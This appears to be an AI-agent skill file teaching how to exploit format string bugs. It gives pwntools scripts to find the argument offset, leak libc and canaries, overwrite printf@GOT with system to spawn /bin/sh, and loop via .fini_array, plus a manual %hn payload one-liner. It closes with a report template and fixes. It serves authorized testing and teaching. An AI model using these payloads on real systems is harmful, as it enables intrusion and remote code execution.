name: exploiting-format-string-vulnerabilities
description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write primitives (%n) to hijack control flow via GOT/.fini_array overwrites.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- format-string
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0
Exploiting Format String Vulnerabilities
When to Use
- During authorized binary-exploitation assessments when attacker input is passed as the format argument to printf, fprintf, sprintf, snprintf, vprintf, syslog, or similar.
- When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat ASLR/PIE/canary protections.
- When you have an arbitrary-write opportunity via %n/%hn to overwrite a GOT entry, .fini_array, a saved return address, or a function pointer.
- On Windows x64 services where a buggy _snprintf(dst, len, attacker_fmt) call passes no varargs, so the first conversion reads whatever is in R9 (RCX, RDX and R8 hold the three named arguments) and later conversions read stack slots.
Critical: Concepts/Steps Most Often Missed
- Put the format specifiers BEFORE the target address, not after. printf stops reading at the first NUL byte. If you send p64(addr) + b"%7$s", the address (whose high bytes are NUL on 64-bit) terminates the string and the specifiers are never processed. Send b"%7$s" + padding + p64(addr) instead, and align so the address lands on a pointer boundary.
- Use %hn (2 bytes), not %n (4 bytes), for full addresses. Writing a 4-byte value like 0x08049724 in one go requires printing about 134 million characters. Split the write into two %hn operations (high and low halves) and emit the smaller half-value first.
- Confirm the offset precisely. Sending AAAA%p%p%p... is not enough; brute-force AAAA%N$p until the output shows 0x41414141 and verify with BBBB that you control a full aligned pointer slot. Off-by-one offset errors silently read the wrong slot.
- %n writes are disabled by FORTIFY. With _FORTIFY_SOURCE=2, glibc aborts on %n when the format string lives in writable memory; on those targets you are limited to read primitives (still enough to leak canary/libc and pair with another bug).
- Let pwntools do the math. FmtStr() can discover the offset automatically and fmtstr_payload() crafts the multi-write payload; manual HOB/LOB arithmetic is error-prone.
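The "specifiers first, address last" layout from the first point can be sketched with the standard library alone. This is a minimal illustration, not a pwntools API: build_read_payload is a hypothetical helper, and it assumes the buffer starts exactly at argument index buf_offset and that each stack slot is one pointer wide.

```python
import struct

def build_read_payload(buf_offset: int, addr: int, word: int = 8) -> bytes:
    """Lay out b'%N$s' + padding + packed address (hypothetical helper).

    buf_offset: argument index where the start of the buffer appears.
    word: pointer size in bytes (8 on x86-64, 4 on i386).
    """
    pack = "<Q" if word == 8 else "<I"
    words = 1  # slots reserved for the specifier part
    while True:
        # The address sits right after the specifier slots.
        spec = f"%{buf_offset + words}$s".encode()
        if len(spec) <= words * word:
            break
        words += 1
    padded = spec.ljust(words * word, b"|")  # pad to a slot boundary
    return padded + struct.pack(pack, addr)

payload = build_read_payload(buf_offset=6, addr=0x404020)
print(payload)
```

With the buffer at argument 6, the specifier occupies slot 6 and the address lands in slot 7, so no NUL byte appears before the format text has been read.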
How to CONFIRM
A read primitive is confirmed when a chosen %N$p/%N$s returns attacker-known data: send b"AAAA%6$p" and confirm that
0x41414141 (or 0x...41414141 on 64-bit) appears in the output, which proves your buffer is at stack arg 6. A write
primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with the %s read
primitive and verify the bytes changed, or set a watchpoint in gdb on the write target and observe the value land.
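To make the read check concrete, the sketch below decodes a %p result back into the bytes held in that slot. The helper names are hypothetical, and it assumes a little-endian target and glibc's habit of printing "(nil)" for a NULL pointer.

```python
def slot_bytes(leak: str, word: int = 8) -> bytes:
    """Turn a %p result such as '0x7024362541414141' into the slot's raw bytes."""
    value = 0 if leak.strip() == "(nil)" else int(leak, 16)
    return value.to_bytes(word, "little")

def holds_marker(leak: str, marker: bytes = b"AAAA", word: int = 8) -> bool:
    """True when the slot starts with the marker, so the buffer begins at this slot."""
    return slot_bytes(leak, word).startswith(marker)

print(slot_bytes("0x7024362541414141"))    # b'AAAA%6$p'
print(holds_marker("0x7024362541414141"))  # True
print(holds_marker("0x4141414100007ffc"))  # False: the marker straddles two slots
```

The third case is the off-by-some-bytes situation: the marker is visible in the output, but the buffer is not aligned to the slot, so padding is needed before an address can be placed there.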
Workflow
Step 1: Confirm the Bug and Find the Argument Offset
from pwn import *
context.binary = elf = ELF('./chall', checksec=False)
# Brute-force the stack offset where our input lands
for i in range(1, 50):
    p = process('./chall')
    p.sendline(f"AAAA%{i}$p".encode())
    out = p.clean(timeout=1)
    p.close()
    # Match without the 0x prefix: on 64-bit the slot prints as 0x...41414141
    if b"41414141" in out:
        log.success(f"Input is at offset {i}")
        break
A quick manual probe: %p %p %p %p %p %p printed by a printf(buffer) reveals stack values; %x leaking attacker
bytes proves the format string is attacker-controlled.
Step 2: Build the Read Primitive (Leak Stack / libc / Canary)
# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload = b"%7$s" # offset 7 holds our address slot
payload += b"|" * (8 - len(b"%7$s")) # pad so the pointer is 8-aligned
payload += p64(0x404020) # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())
# Leak a libc pointer from the stack, then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# The +243 return offset is build-specific (e.g. Ubuntu 20.04's glibc 2.31); confirm it in gdb
libc.address = leak - libc.symbols['__libc_start_main'] - 243
log.info("libc base @ %#x", libc.address)
Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on the stack/BSS.
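The base computation is simple subtraction, but a page-alignment check catches a wrong offset or a mismatched libc early. A minimal sketch follows; libc_base is a hypothetical helper, and the symbol offset 0x26fc0 is an illustrative value for one libc build, not something to rely on.

```python
PAGE_SIZE = 0x1000

def libc_base(leak: int, symbol_offset: int, delta: int) -> int:
    """Recover the libc base from a leaked pointer at symbol + delta."""
    base = leak - delta - symbol_offset
    if base % PAGE_SIZE:
        # A real mapping base is always page-aligned.
        raise ValueError(f"base {base:#x} is not page-aligned: wrong offset or wrong libc")
    return base

# Illustrative numbers only: leak = base + 0x26fc0 + 243
base = libc_base(0x7ffff7dcc0b3, symbol_offset=0x26fc0, delta=243)
print(hex(base))  # 0x7ffff7da5000
```

If the check fails, the usual causes are a different libc version on the target or a leaked slot that is not the return address into __libc_start_main.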
Step 3: Build the Write Primitive and Hijack Control Flow
# Let pwntools craft the multi-%hn write. Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()
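Manual two-step %hn (when not using pwntools): place the two target addresses first (on 32-bit they contain no NUL bytes), then write the smaller half-value followed by the larger one with %.<pad>x%<arg>$hn:
# Example: write 0xbffffc2f to 0x08049724. Args 4 and 5 are the two address slots:
# 0xbfff goes to 0x08049726 (high half) first, then 0xfc2f goes to 0x08049724 (low half).
python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x%4$hn" + b"%.15408x%5$hn" + b"\n")'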
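The padding values in the one-liner above come from simple modular arithmetic, sketched below. two_hn_payload is a hypothetical helper for a 32-bit target. It assumes the two packed addresses open the payload, occupy consecutive argument slots starting at first_arg, and contain no NUL bytes.

```python
import struct

def two_hn_payload(target: int, value: int, first_arg: int) -> bytes:
    """Build addresses + '%.<pad>x%<arg>$hn' pairs for a 32-bit write (sketch)."""
    # Pair each 16-bit half with the address it must land on, smaller half first.
    halves = sorted([(value & 0xFFFF, target), ((value >> 16) & 0xFFFF, target + 2)])
    addrs = b"".join(struct.pack("<I", addr) for _, addr in halves)
    count = len(addrs)  # bytes printed so far: the raw addresses
    fmt = b""
    for i, (half, _) in enumerate(halves):
        pad = (half - count) % 0x10000  # %hn stores only the low 16 bits
        if 0 < pad < 8:
            pad += 0x10000  # %.Nx is only exact once N covers all 8 hex digits
        if pad:
            fmt += f"%.{pad}x".encode()
        fmt += f"%{first_arg + i}$hn".encode()
        count += pad
    return addrs + fmt

print(two_hn_payload(0x08049724, 0xBFFFFC2F, first_arg=4))
```

For the values used above this reproduces the paddings 49143 and 15408: the first is 0xbfff minus the 8 address bytes already printed, the second is 0xfc2f minus 0xbfff.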
Step 4: Make the Bug Reusable / Escalate
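# If you need another pass through the vulnerable code, overwrite .fini_array
# to loop back to main so the bug can be triggered again.
# send_payload, offset, padlen and INIT_LOOP_ADDR come from your own harness.
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
# __init_array_end usually coincides with the start of .fini_array; confirm with readelf -S
fmt.write(elf.symbols['__init_array_end'], INIT_LOOP_ADDR) # loop back
fmt.write(elf.got['printf'], elf.plt['system']) # then redirect
fmt.execute_writes() # sends every queued write in one payload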
On Windows x64, prepend %p to leak whatever pointer sits in R9 at the call-site, recover the module base as
leak - known_offset, and reuse it to compute gadget/IAT addresses for a ROP chain.
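The base recovery is the same subtraction, with a 64 KiB alignment check because Windows maps images on allocation-granularity boundaries. The sketch below uses hypothetical helper names and made-up offsets. It also assumes the leaked %p text is a bare hex string, which is how the MSVC runtime typically prints pointers.

```python
ALLOCATION_GRANULARITY = 0x10000  # Windows image bases are 64 KiB aligned

def parse_pointer(text: str) -> int:
    """Parse a %p result; int() accepts the text with or without a 0x prefix."""
    return int(text.strip(), 16)

def image_base(leak: int, known_offset: int) -> int:
    """Module base = leaked in-module pointer minus its static offset."""
    base = leak - known_offset
    if base % ALLOCATION_GRANULARITY:
        raise ValueError(f"base {base:#x} is not 64 KiB aligned: wrong offset or module")
    return base

def rebase(base: int, rvas: dict) -> dict:
    """Turn static RVAs (from the disassembler) into runtime addresses."""
    return {name: base + rva for name, rva in rvas.items()}

# Illustrative values only
leak = parse_pointer("00007FF6A1B2C3D4")
base = image_base(leak, known_offset=0xC3D4)
print(hex(base), rebase(base, {"pop_rcx_ret": 0x1A2B}))
```

The known offset has to be taken from the exact build of the target module, since it changes whenever the binary is recompiled.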
Key Concepts
| Concept | Description |
|---|---|
| Format specifier | %x/%p read stack words, %s dereferences a pointer and prints a string, %n writes the byte count to a pointed address. |
| Direct parameter access | %N$x selects the N-th argument directly (e.g. %4$p reads the 4th), avoiding long specifier chains. |
| Argument offset | The stack index at which attacker-controlled input appears; the anchor for both read and write primitives. |
| %n / %hn / %hhn | Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively. |
| HOB / LOB | High-order and low-order halves of a target address; written separately with two %hn operations. |
| GOT overwrite | Replacing a GOT entry (e.g. printf) with another function (e.g. system) so the next call is redirected. |
| .fini_array loop | Overwriting a destructor pointer to re-enter main, giving extra exploitation passes. |
| Width padding | %.<num>x or %<num>c emits num characters from a short specifier, so %n can write a large value without a huge input buffer. |
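The width difference between %n, %hn and %hhn can be modelled as a truncating store of the running character count. The following is a small simulation, not target code. apply_write is a hypothetical name, and the sizes assume a typical platform where int is 4 bytes.

```python
WIDTHS = {"n": 4, "hn": 2, "hhn": 1}  # bytes stored by each specifier

def apply_write(mem: bytearray, addr: int, printed: int, kind: str) -> None:
    """Store the low bytes of the printed-character count at addr, little-endian."""
    size = WIDTHS[kind]
    mem[addr:addr + size] = (printed % (1 << (8 * size))).to_bytes(size, "little")

mem = bytearray(8)
apply_write(mem, 0, 0x1BFFF, "hn")   # only the low 16 bits (0xbfff) are stored
apply_write(mem, 2, 0x1BFFF, "hhn")  # only the low 8 bits (0xff) are stored
print(mem.hex())  # ffbfff0000000000
```

Because the store truncates, a later write can target a smaller value than an earlier one by letting the count wrap past 0x10000 (or 0x100 for %hhn).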
Tools & Systems
| Tool | Purpose |
|---|---|
| pwntools | fmtstr_payload, FmtStr, ELF.got/ELF.plt/ELF.symbols, process/remote IO, automated offset detection. |
| gdb + pwndbg/GEF | Inspect the stack at the printf call, confirm writes landed, set breakpoints on GOT targets. |
| checksec | Detect RELRO (full RELRO makes GOT read-only), FORTIFY (%n blocked), PIE, canary. |
| objdump / readelf | Enumerate GOT/PLT entries and .fini_array/.init_array addresses. |
| radare2 / Ghidra | Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery). |
| one_gadget | After a libc leak, find a single-shot shell gadget to target with the write. |
Common Scenarios
Scenario 1: Stack secret leak (no flow control needed)
printf(buffer) echoes user input. Brute-forcing %N$s reveals a hardcoded password stored on the stack at offset 10,
or %N$p leaks a heap/libc address — enough to win without altering execution.
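When sweeping %N$p across many offsets, a rough classifier helps spot which slots are worth a closer look. The ranges below are heuristics for typical x86-64 Linux address layouts, stated as assumptions rather than guarantees, and classify_leak is a hypothetical helper.

```python
def classify_leak(value: int) -> str:
    """Guess what a leaked 64-bit stack word is (heuristic, x86-64 Linux)."""
    if value == 0:
        return "null"
    if 0x7FFC00000000 <= value <= 0x7FFFFFFFFFFF:
        return "stack"        # typical stack region
    if 0x7F0000000000 <= value < 0x7FFC00000000:
        return "libc/mmap"    # shared libraries and other mmap regions
    if 0x550000000000 <= value < 0x570000000000:
        return "pie/heap"     # PIE image or brk heap with ASLR
    if (value & 0xFF) == 0 and value > 0xFFFFFFFFFFFF:
        return "canary?"      # canaries end in a NUL byte and are not pointers
    return "data"

for word in (0x7FFE4A3B2C10, 0x7F3A1C2B70B3, 0x55D4E8A01230, 0x3A91C4E7B2D05F00):
    print(hex(word), classify_leak(word))
```

Any candidate still needs confirming in a debugger, since a random data word can fall inside one of these ranges.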
Scenario 2: GOT overwrite to system
A 32-bit no-RELRO binary calls printf(user) in a loop. fmtstr_payload(5, {got['printf']: libc.sym['system']})
redirects printf to system; the next iteration with input /bin/sh spawns a shell.
Scenario 3: ret2win via .fini_array + GOT
A binary with a one-shot format string overwrites .fini_array to loop back to main, then on the second pass writes
the win/system address into a GOT slot used right after.
Scenario 4: Windows x64 ASLR defeat
A service does _snprintf(dst, 0xff2, keyData) with no varargs. A leading %p prints the value in R9 — a stable
in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.
Output Format
## Format String Finding
**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()
### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable
### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.
### Impact
Arbitrary memory read/write leading to remote code execution.
### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and -D_FORTIFY_SOURCE=2 (which only takes effect with optimization enabled, e.g. -O2).
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.